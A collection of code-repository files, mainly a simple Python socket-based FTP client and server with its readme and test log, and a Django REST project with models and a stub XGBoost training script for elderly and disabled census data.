for k, v in row.items()}\n addresses.append(\n \"\"\"\\\n <div class=\"address\">\n <span>{title} {initial} {first_name} {surname}</span>\n <span>{address_1}</span>\n <span>{address_2}</span>\n <span>{address_3}</span>\n <span>{town}</span>\n <span>{post_code}</span>\n </div>\"\"\".format(**address)\n )\n\npages = []\n\nfor adr in chunk(addresses, 21):\n pages.append('<div class=\"page\">\\n{}\\n</div>'.format('\\n'.join(adr)))\n\n\nstyles = \"\"\"\\\n<style>\n html, body {\n margin: 0;\n padding: 0;\n }\n .page {\n width: 210mm;\n height: 297mm;\n box-sizing: border-box;\n padding-top: 12mm;\n padding-bottom: 17mm;\n padding-left: 7mm;\n margin: 0 auto;\n display: grid;\n grid-template-columns: repeat(3, 1fr);\n grid-template-rows: repeat(7, 1fr);\n page-break-after: always;\n border: 1px solid #ddd;\n }\n @media print\n {\n .page {\n border: none;\n }\n }\n .address {\n font-size: 0.9rem;\n margin: 0 5.5mm;\n padding-top: 6.5mm;\n }\n .address span {\n display: block;\n }\n</style>\n\"\"\"\nall = '\\n'.join(pages)\nPath('out/output.html').write_text(f\"\"\"\\\n{styles}\n{all}\n\"\"\"\n)\n" } ]
2
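build.py above lays the labels out 21 to an A4 page by slicing the address list with its chunk helper; the pagination logic on its own, with dummy data:

```python
def chunk(items, n):
    # Yield successive n-sized slices, as in build.py.
    for i in range(0, len(items), n):
        yield items[i:i + n]

addresses = ['<div class="address">address {}</div>'.format(i) for i in range(50)]
pages = ['<div class="page">\n{}\n</div>'.format('\n'.join(group))
         for group in chunk(addresses, 21)]
print(len(pages))  # 3 pages: 21 + 21 + 8 labels
```

The 7x3 CSS grid in the styles block then positions each page's 21 labels on the printed sheet.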
liuxingrichu/simple-FTP
https://github.com/liuxingrichu/simple-FTP
15451843dbe9cd89a66298bcbc30c972105b12bf
93e1254146f616b8d21410da1b277d9947d54db6
03cc66bb2063f75ed1afcbfbd2ae0ef4e476e3d1
refs/heads/master
2021-01-22T07:35:50.560168
2017-02-18T04:04:55
2017-02-18T04:04:55
81,836,517
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.44285714626312256, "alphanum_fraction": 0.4642857015132904, "avg_line_length": 18.928571701049805, "blob_id": "f097b797b94253580cc05f058ffae95f49e99963", "content_id": "26e545b50a28a7d25e65d485b18f4934d867f752", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 926, "license_type": "no_license", "max_line_length": 74, "num_lines": 28, "path": "/FTP思路.md", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "GB18030", "text": "\n目录结构:\n\nFTPClient\n\tftp_client.py\t\t客户端\n\ttest1-3.txt\t\t\t测试文件\nFTPServer\n\tftp_server.py\t\t服务器\nconf\n\t__init__.py\t\t\t配置信息\ndatabase\n\tinit_db.py\t\t\t初始化用户名和密码\n\t\n*************************************************************************\t\n\n程序运行说明:\n\n(1)通过database中的init_db.py生成用户名和密码\n\n(2)服务器端先运行,再启动客户端\n\n(3)客户端打印下面提示信息,通过用户选择,进行相应操作\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n\n(4)服务端,仅打印用户登录、退出信息及客户端断开信息\n\n(5)对应异常情况,进行捕获处理,保证服务器不因客户端状态而停止工作。\n\n" }, { "alpha_fraction": 0.4959999918937683, "alphanum_fraction": 0.6159999966621399, "avg_line_length": 14.75, "blob_id": "932704c2c8d5981064e0fa708e50f19aa24775c4", "content_id": "352e051f4fc0e503d154bb0de1dbb493ecbf6d6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 125, "license_type": "no_license", "max_line_length": 22, "num_lines": 8, "path": "/FTPClient/settings.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nSUCCESS_CODE = '200'\nFAIL_CODE = '404'\nsize = 1024\nip = 'localhost'\nport = 6969" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.49646198749542236, "avg_line_length": 31.69403076171875, "blob_id": "8e7001153b78b7ac7d443defa9a9bc5eb6021cb2", "content_id": "15db3dec13ca95a61424eded25b809680358ca60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4633, "license_type": "no_license", "max_line_length": 79, "num_lines": 134, "path": "/FTPClient/ftp_client.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\nimport re\nimport socket\nimport sys\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_PATH)\n\nimport settings\n\ntemplates = [\"【1】登录\", \"【2】上传文件\", \"【3】下载文件\", \"【4】查看文件列表\", \\\n \"【5】退出\"]\n\n\nclass SimpleClient(object):\n \"\"\"\n FTP client\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n\n def login(self, conn):\n user_info = \"|\".join([\"login\", self.username, self.password])\n conn.send(bytes(user_info, encoding='utf-8'))\n return conn.recv(settings.size)\n\n def upload(self, file_name, client):\n data_list = ['upload', file_name]\n try:\n with open(file_name, 'r') as f:\n data_list.append(f.read())\n except FileNotFoundError:\n print(\"\\t\\033[0;31m文件不存在\\033[1m\")\n return False\n client.send(bytes(\"|\".join(data_list), encoding='utf-8'))\n return True\n\n def download(self, file_name, client):\n data_list = ['download', file_name]\n client.send(bytes(\"|\".join(data_list), encoding='utf-8'))\n file_data = client.recv(settings.size)\n if file_data == bytes(settings.FAIL_CODE, encoding='utf-8'):\n return settings.FAIL_CODE\n with open(file_name, 'wb') as f:\n 
f.write(file_data)\n return settings.SUCCESS_CODE\n\n def show_file_list(self, data):\n start_index = data.index('[') + 1\n tmp = re.split(\"[',]\", data[start_index:-2])\n data_list = []\n for i in tmp:\n if i.strip():\n data_list.append(i)\n print(\"文件列表\".center(30, '-'))\n for i in data_list:\n print(i)\n print(\"end\".center(33, '-'))\n\n def logout(self, conn):\n conn.close()\n\n\ndef main():\n client = socket.socket()\n client.connect((settings.ip, settings.port))\n user_status = False\n\n while True:\n print(\"FTP客户端\".center(67, \"-\"))\n print(\"{} {} {} {} {}\".format(templates[0], templates[1], templates[2],\n templates[3], templates[4]))\n print(\"end\".center(70, '-'))\n\n choice = input(\">>\").strip()\n if choice == \"1\":\n if not user_status:\n username = input(\"Enter username : \").strip()\n password = input(\"Enter password :\").strip()\n client_obj = SimpleClient(username, password)\n res = client_obj.login(client)\n if res == bytes(settings.SUCCESS_CODE, encoding='utf-8'):\n print(\"\\t\\033[0;32m欢迎%s登陆\\033[1m\" % username)\n user_status = True\n else:\n print(\"\\t\\033[0;31m用户名或密码错误!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m用户已登陆!\\033[1m\")\n elif choice == \"2\":\n if user_status:\n print(\"\\t请输入上传文件名称,例如test.txt\")\n file_name = input(\"Enter upload file name : \").strip()\n res = client_obj.upload(file_name, client)\n if res:\n print(\"\\t\\033[0;32m文件上传成功!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m请登录\\033[1m\")\n elif choice == \"3\":\n if user_status:\n print(\"\\t请输入下载文件名称,例如test.txt\")\n file_name = input(\"Enter download file name : \").strip()\n res = client_obj.download(file_name, client)\n if res == settings.SUCCESS_CODE:\n print(\"\\t\\033[0;32m文件下载成功!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m文件不存在!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m请登录!\\033[1m\")\n elif choice == \"4\":\n if user_status:\n client.send(bytes('ls', encoding='utf-8'))\n data = client.recv(settings.size)\n client_obj.show_file_list(str(data))\n else:\n print(\"\\t\\033[0;31m请登录!\\033[1m\")\n elif choice == \"5\":\n if user_status:\n client.send(bytes(\"quit\", encoding='utf-8'))\n client_obj.logout(client)\n break\n else:\n print(\"\\t\\033[0;31m请登录!\\033[1m\")\n else:\n print(\"\\t\\033[0;31m请输入正确选项!\\033[1m\")\n continue\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.579365074634552, "alphanum_fraction": 0.6388888955116272, "avg_line_length": 18.461538314819336, "blob_id": "6bc65807c57437c0f4182d5249b84c4533e38ace", "content_id": "89b74753f50d92c0b50e8096d267a31e505a6829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": "no_license", "max_line_length": 49, "num_lines": 13, "path": "/FTPServer/settings.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\n\nftp_path = r\"d:\\FTP_test\"\ndb_path = os.path.join(ftp_path, \"etc\")\nfile_path = os.path.join(db_path, \"user_info.db\")\nSUCCESS_CODE = '200'\nFAIL_CODE = '404'\nsize = 1024\nip = 'localhost'\nport = 6969" }, { "alpha_fraction": 0.4981183707714081, "alphanum_fraction": 0.5049606561660767, "avg_line_length": 29.44791603088379, "blob_id": "5fbc0afea87236d98ce059d5c7f8c483a63a0a96", "content_id": "db3e66046f39c4169d377a2c00cb5db29985a9f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2967, "license_type": "no_license", "max_line_length": 77, "num_lines": 96, "path": 
"/FTPServer/ftp_server.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\nimport socket\nimport sys\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_PATH)\n\nfrom log import logger\nimport settings\n\n\nclass SimpleServer(object):\n \"\"\"\n FTP server\n \"\"\"\n\n def user_auth(self, data_list, conn):\n try:\n with open(settings.file_path, \"r\", encoding='utf-8') as f:\n for line in f:\n if line.strip() == '|'.join(data_list):\n return True\n return False\n except FileNotFoundError:\n logger.error('请先创建用户')\n\n def create_home(self, user_home):\n dir_path = os.path.join(settings.ftp_path, user_home)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n os.chdir(dir_path)\n\n def save_file(self, file_name, file_data):\n data_list = file_data.split(\"\\n\")\n with open(file_name, 'w') as f:\n for line in data_list:\n f.write(line)\n f.write('\\n')\n\n def send_file(self, file_name, conn):\n try:\n with open(file_name, 'rb') as f:\n conn.send(f.read())\n except FileNotFoundError:\n conn.send(bytes(settings.FAIL_CODE, encoding=\"utf-8\"))\n\n def show_file_list(self, conn):\n cwd = os.getcwd()\n res = os.listdir(cwd)\n conn.send(bytes(str(res), encoding=\"utf-8\"))\n\n\ndef main():\n sever = socket.socket()\n sever.bind((settings.ip, settings.port))\n sever.listen()\n sever_obj = SimpleServer()\n while True:\n conn, addr = sever.accept()\n username = None\n while True:\n try:\n data = str(conn.recv(settings.size))\n except ConnectionResetError:\n if username:\n logger.warning(\"{} 异常退出!\".format(username))\n else:\n logger.warning(\"{} 异常退出!\".format(addr[0]))\n break\n\n data_list = data[2:-1].split('|')\n if data_list[0] == \"login\":\n res = sever_obj.user_auth(data_list[1:], conn)\n if res:\n sever_obj.create_home(data_list[1])\n username = data_list[1]\n logger.info(\"{} 登陆!\".format(username))\n conn.send(bytes(settings.SUCCESS_CODE, encoding='utf-8'))\n else:\n conn.send(bytes(settings.FAIL_CODE, encoding='utf-8'))\n elif data_list[0] == \"upload\":\n sever_obj.save_file(data_list[1], data_list[2])\n elif data_list[0] == \"download\":\n sever_obj.send_file(data_list[1], conn)\n elif data_list[0] == \"ls\":\n sever_obj.show_file_list(conn)\n elif data_list[0] == \"quit\":\n logger.info('%s 退出!' 
% username)\n break\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.5728542804718018, "alphanum_fraction": 0.5928143858909607, "avg_line_length": 17.55555534362793, "blob_id": "f206c671932f44ece99da3bed27f2ea36e651ce5", "content_id": "e445d3b6d317f1dd24b04c0b2ed81b5f9f41d6d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 501, "license_type": "no_license", "max_line_length": 71, "num_lines": 27, "path": "/database/init_db.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\nimport sys\n\n\nBASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_PATH)\n\nfrom FTPServer import settings\n\n\nuser_list = ['Lucy|123', 'Tom|123456']\n\n\ndef main():\n if not os.path.exists(settings.db_path):\n os.makedirs(settings.db_path)\n with open(settings.file_path, 'w+') as f:\n for i in user_list:\n f.write(i)\n f.write('\\n')\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.26060420274734497, "alphanum_fraction": 0.31980469822883606, "avg_line_length": 32.773197174072266, "blob_id": "9dcf96493d4b845f6756641f2ed9f94eb94846ec", "content_id": "2d7e1870762af35ff79f50fdec583eef20483a82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4347, "license_type": "no_license", "max_line_length": 70, "num_lines": 97, "path": "/test.md", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "GB18030", "text": "\n服务器测试数据:\n-------------------------------------------------------------------\n2017-02-13 22:25:16.992743 Lucy 登陆!\n2017-02-13 22:25:23.613122 Lucy 退出!\n2017-02-13 22:25:32.279617 127.0.0.1 断开连接!\n2017-02-13 22:25:55.120924 Tom 登陆!\n2017-02-13 22:26:05.040491 Tom 异常退出!\n======================================================================\n\n客户端测试数据:\n\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>1\nEnter username : Lucy\nEnter password :123\n\t欢迎Lucy登陆\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>2\n\t请输入上传文件名称,例如test.txt\nEnter upload file name : test2.txt\n\t文件上传成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>2\n\t请输入上传文件名称,例如test.txt\nEnter upload file name : test4.txt\n\t文件不存在\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>3\n\t请输入下载文件名称,例如test.txt\nEnter download file name : test1.txt\n\t文件下载成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>4\n-------------文件列表-------------\ntest1.txt\ntest2.txt\ntest3.txt\n---------------end---------------\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>5\n\nProcess finished with exit code 0\n\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 
【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>1\nEnter username : Tom\nEnter password :123456\n\t欢迎Tom登陆\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>2\n\t请输入上传文件名称,例如test.txt\nEnter upload file name : test1.txt\n\t文件上传成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>2\n\t请输入上传文件名称,例如test.txt\nEnter upload file name : test2.txt\n\t文件上传成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>3\n\t请输入下载文件名称,例如test.txt\nEnter download file name : test1.txt\n\t文件下载成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>4\n-------------文件列表-------------\ntest1.txt\ntest2.txt\n---------------end---------------\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>5\n\nProcess finished with exit code 0\n" } ]
7
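Client and server above frame every request as pipe-separated fields over the socket ("login|user|pass", "upload|name|data", ...). A tiny round trip of just that framing step, without the sockets (field values are examples):

```python
def encode(*fields):
    # client side: join the command and its arguments with '|'
    return "|".join(fields).encode("utf-8")

def decode(raw):
    # server side: split the command back out of the byte string
    return raw.decode("utf-8").split("|")

cmd, *args = decode(encode("login", "Lucy", "123"))
print(cmd, args)  # login ['Lucy', '123']
```

A limitation worth noting: this framing cannot carry '|' inside a field, so it only suits names and small text payloads like the ones used here.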
arun32401/MachineLearningGenesysIWC
https://github.com/arun32401/MachineLearningGenesysIWC
408b62a0f3415899aa5776a1e916a821e9a57805
81a2b7d14f0271733954da75d8be9cc8d735b598
594bcbcd56f8030c4f0285edf4b0a796c6437a7f
refs/heads/master
2020-09-10T03:00:41.978619
2019-11-21T08:42:12
2019-11-21T08:42:12
221,632,286
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7046070694923401, "alphanum_fraction": 0.7046070694923401, "avg_line_length": 31.363636016845703, "blob_id": "95f65de80b19f076491d895f2ff84144ee1610b4", "content_id": "134fef16e0d50bef4969b8a60636445cea385a01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 53, "num_lines": 11, "path": "/ElderlyProject/oldperson/admin.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom oldperson.models import Oldperson\r\nfrom django.contrib.admin.options import ModelAdmin\r\n# Register your models here.\r\n\r\nclass OldpersonAdmin(ModelAdmin):\r\n list_display =[\"SERIALNO\", \"PUMA\", \"ST\", \"PWGTP\"]\r\n# search_fields = [\"SERIALNO\"]\r\n# list_filter=[\"ST\"]\r\n# \r\nadmin.site.register(Oldperson, OldpersonAdmin)\r\n\r\n" }, { "alpha_fraction": 0.6037735939025879, "alphanum_fraction": 0.7654986381530762, "avg_line_length": 30, "blob_id": "0759eee3bcd064e7ccc67187a55c67e344d2794c", "content_id": "9d56ccab49b60aeabaed2f8079b9ee9031a2450c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 371, "license_type": "no_license", "max_line_length": 53, "num_lines": 12, "path": "/frontend/src/config/firebase.js", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "const firebaseConfig = {\n\tapiKey: \"AIzaSyCw2rwJPbed3PNxF7vEPYNMRhxaLeRkjMM\",\n\tauthDomain: \"chatapp-80670.firebaseapp.com\",\n\tdatabaseURL: \"https://chatapp-80670.firebaseio.com\",\n\tprojectId: \"chatapp-80670\",\n\tstorageBucket: \"chatapp-80670.appspot.com\",\n\tmessagingSenderId: \"282698313573\",\n\tappId: \"1:282698313573:web:18d315f46f2a2e17ae7b8c\",\n\tmeasurementId: \"G-PZPF13YWTQ\"\n};\n\nexport default firebaseConfig;" }, { "alpha_fraction": 0.6426116824150085, "alphanum_fraction": 0.6632302403450012, "avg_line_length": 21.08333396911621, "blob_id": "b8b39af9c0c2ac79cf17208205a170d88ce9397c", "content_id": "b53a1bec72704a11835453886e4257cba052fc99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "no_license", "max_line_length": 66, "num_lines": 12, "path": "/ElderlyProject/oldperson/myserializer.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\nfrom oldperson.models import Oldperson\r\nfrom rest_framework import serializers\r\n\r\nclass OldpersonSerializer(serializers.HyperlinkedModelSerializer):\r\n class Meta:\r\n model = Oldperson\r\n fields = \"__all__\"\r\n \r\n " }, { "alpha_fraction": 0.4905933439731598, "alphanum_fraction": 0.515195369720459, "avg_line_length": 26.79166603088379, "blob_id": "78e0aa2783f71dbdaf8b8494593400541219f05b", "content_id": "8a4168b3ec1e344edd41bf01375030f3198939ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 691, "license_type": "no_license", "max_line_length": 114, "num_lines": 24, "path": "/ElderlyProject/disabledperson/migrations/0001_initial.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.7 on 2019-11-13 09:59\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n initial = True\r\n\r\n dependencies = [\r\n ]\r\n\r\n 
operations = [\r\n migrations.CreateModel(\r\n name='Disabledperson',\r\n fields=[\r\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('PUMA', models.IntegerField()),\r\n ('ST', models.IntegerField()),\r\n ('AGEP', models.IntegerField()),\r\n ('SEX', models.IntegerField(choices=[('MALE', '1'), ('FEMALE', '2')])),\r\n ],\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 19.600000381469727, "blob_id": "7759f10205fa1b4b7ecfb70e9051d322a5f263df", "content_id": "a2dca8ff5516a385b3968e4179d3fc90d79bb7a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 108, "license_type": "no_license", "max_line_length": 38, "num_lines": 5, "path": "/ElderlyProject/disabledperson/apps.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\r\n\r\n\r\nclass DisabledpersonConfig(AppConfig):\r\n name = 'disabledperson'\r\n" }, { "alpha_fraction": 0.5266666412353516, "alphanum_fraction": 0.5311111211776733, "avg_line_length": 26.125, "blob_id": "af8c72b967cc97f842f54ce3e991a52c09a2b60d", "content_id": "c45ca6c81cae5eaa07ede922325bd54cd62ec215", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 72, "num_lines": 16, "path": "/ElderlyProject/disabledperson/models.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.db import models\r\n\r\n# Create your models here.\r\nclass Disabledperson(models.Model):\r\n PUMA = models.IntegerField()\r\n ST = models.IntegerField()\r\n AGEP = models.IntegerField()\r\n SEX = models.IntegerField(choices = ((\"1\", \"MALE\"),(\"2\", \"FEMALE\")))\r\n \r\n def to_dict(self):\r\n return{\r\n 'PUMA':self.PUMA,\r\n 'ST':self.ST,\r\n 'AGEP':self.AGEP,\r\n 'SEX':self.SEX\r\n }\r\n" }, { "alpha_fraction": 0.6655948758125305, "alphanum_fraction": 0.6848874688148499, "avg_line_length": 22.75, "blob_id": "6e179fd2f063d208de9d1dcbb4bc5cb9a77b3f79", "content_id": "f50e02b292101cf04c8db4d77f1c67968ff49254", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 71, "num_lines": 12, "path": "/ElderlyProject/disabledperson/myserializer.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\nfrom disabledperson.models import Disabledperson\r\nfrom rest_framework import serializers\r\n\r\nclass DisabledpersonSerializer(serializers.HyperlinkedModelSerializer):\r\n class Meta:\r\n model = Disabledperson\r\n fields = \"__all__\"\r\n \r\n " }, { "alpha_fraction": 0.6361256837844849, "alphanum_fraction": 0.6832460761070251, "avg_line_length": 36, "blob_id": "87375bad3f3ab94ea3a2077d5cb650fd7dfd770d", "content_id": "4eb362317613c6eb69e3f3168f103f201ad1e080", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 382, "license_type": "no_license", "max_line_length": 49, "num_lines": 10, "path": "/ElderlyProject/oldperson/models.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.db import models\r\n\r\n# Create your models here.\r\nclass Oldperson(models.Model):\r\n SERIALNO = models.CharField(max_length = 100)\r\n SPORDER = 
models.CharField(max_length = 100)\r\n    SPORDER = models.CharField(max_length = 100)\r\n    PUMA = models.CharField(max_length = 100)\r\n    ST = models.CharField(max_length = 100)\r\n    PWGTP = models.CharField(max_length = 100)\r\n    AGEP = models.CharField(max_length = 100)\r\n\r\n" }, { "alpha_fraction": 0.6781193614006042, "alphanum_fraction": 0.6889692544937134, "avg_line_length": 23.136363983154297, "blob_id": "4b42ed73b13c9ddafe8a7bb93dc269cb24905da1", "content_id": "582a3f7c51743dcf28737fefc51b9ec011185d1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/ElderlyProject/disabledperson/urls.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\n\r\nfrom django.urls import path\r\nfrom disabledperson import views\r\nfrom django.views.generic.base import RedirectView\r\nfrom rest_framework import routers\r\nfrom django.urls.conf import include\r\n\r\n\r\nrouter = routers.DefaultRouter()\r\nrouter.register(r'disabledperson', views.DisabledpersonViewSet)\r\n\r\nurlpatterns = [\r\n#     path('home/', views.home),\r\n    path(r'api/', include(router.urls)),\r\n#     path('', RedirectView.as_view(url = \"home/\")),\r\n    path('', RedirectView.as_view(url = \"api/\")),\r\n]\r\n" }, { "alpha_fraction": 0.6105263233184814, "alphanum_fraction": 0.6175438761711121, "avg_line_length": 21.30555534362793, "blob_id": "32fe2d3ecf7f13cb219ca3859083193a179d2811", "content_id": "c392059783f243253ba64f688f71e54f61a7b551", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 49, "num_lines": 36, "path": "/ElderlyProject/oldperson/oldPersonML2.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\n# from sklearn.model_selection import train_test_split\r\nfrom xgboost import XGBClassifier\r\n# from sklearn.metrics import accuracy_score\r\n# from sklearn.metrics import confusion_matrix\r\n\r\n\r\ndef pre_process(df):\r\n    # inspect the raw data before training\r\n    print(df.head())\r\n    print(df.describe())\r\n    return df\r\n\r\n\r\ndef training():\r\n    df = pd.read_excel(\"MLTest.xlsx\")\r\n    df = pre_process(df)\r\n    y = df[\"DEYE\"]\r\n    df.drop(\"DEYE\", axis=\"columns\", inplace=True)\r\n    x = df\r\n    model = XGBClassifier()\r\n#     x_train, x_test, y_train, y_test = tra\r\n    model.fit(x, y)\r\n    print(model.score(x, y))\r\n    yp = model.predict(x)\r\n#     cm=confusion_matrix(y, yp)\r\n\r\n\r\ndef pred():\r\n    pass\r\n " }, { "alpha_fraction": 0.7670454382896423, "alphanum_fraction": 0.7670454382896423, "avg_line_length": 30, "blob_id": "714e5f66378a9f5cf57f021519c4cdf6be56c1fd", "content_id": "c2c1ff0d95de50a36d24732174a5f6c822323ec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 54, "num_lines": 11, "path": "/ElderlyProject/oldperson/views.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from rest_framework import viewsets\r\nfrom oldperson.models import Oldperson\r\nfrom oldperson.myserializer import OldpersonSerializer\r\n\r\n# Create your views here.\r\n# def home(req):\r\n#     return HttpResponse(\"Hi 
Arun\")\r\n\r\nclass OldpersonViewSet(viewsets.ModelViewSet):\r\n queryset = Oldperson.objects.all()\r\n serializer_class = OldpersonSerializer\r\n" }, { "alpha_fraction": 0.7264367938041687, "alphanum_fraction": 0.7264367938041687, "avg_line_length": 31.615385055541992, "blob_id": "08775f2a160007b9b19458360b8b0868bb7796fc", "content_id": "d26e970daac92d72388d2a42cb688df8a7629862", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 435, "license_type": "no_license", "max_line_length": 56, "num_lines": 13, "path": "/ElderlyProject/disabledperson/admin.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom disabledperson.models import Disabledperson\r\nfrom django.contrib.admin.options import ModelAdmin\r\n\r\n# Register your models here.\r\nclass DisabledpersonAdmin(ModelAdmin):\r\n list_display =[\"ST\", \"PUMA\", \"AGEP\"]\r\n# search_fields = [\"PUMA\"]\r\n list_filter=[\"ST\"]\r\n list_filter=[\"SEX\"]\r\n# \r\nadmin.site.register(Disabledperson, DisabledpersonAdmin)\r\n# admin.site.register(Disabledperson)" }, { "alpha_fraction": 0.7542135119438171, "alphanum_fraction": 0.7542135119438171, "avg_line_length": 45.46666717529297, "blob_id": "a461160ba7ef88264f43e3e46e5e330b7342c75c", "content_id": "7c545a99dbb1004f19605ef9ee3f0993bbf98367", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 712, "license_type": "no_license", "max_line_length": 100, "num_lines": 15, "path": "/ElderlyProject/disabledperson/views.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from rest_framework import viewsets\r\nfrom 